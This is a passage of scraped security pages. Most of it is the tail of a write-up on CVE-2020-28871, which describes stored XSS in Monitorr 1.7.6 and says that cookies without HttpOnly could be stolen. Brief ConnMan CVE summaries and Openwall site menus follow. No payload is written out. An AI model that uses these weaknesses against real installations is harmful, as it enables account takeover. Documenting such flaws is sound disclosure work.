4\. Save changes and observe the javascript alert box triggered at the main Monitorr page.

By the way, session cookies don’t have HttpOnly flag, so we can steal authorization cookies.

**Fix**

Unfortunately, the Monitorr command decided to do not to fix these vulnerabilities. To do not have the same issues – ensure, that your software:

1.  Deletes the installation files right after the installation.
2.  Does input sanitization and output encoding of user input.
3.  Checks file uploads properly.

_LL advises to all the researchers do not break real applications_ _illegally. This fun leads to broken businesses and lives, and, most likely, will not make an attacker really rich._

CVE-2020-28871: Authorization Bypass and Remote Code Execution in Monitorr 1.7.6 – Lyhins' Lab

gdhcp in ConnMan before 1.39 could be used by network-adjacent attackers to leak sensitive stack information, allowing further exploitation of bugs in gdhcp.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

CVE-2021-26676: security - Remote code execution in connman

A stack-based buffer overflow in dnsproxy in ConnMan before 1.39 could be used by network adjacent attackers to execute code.

Tag

#rce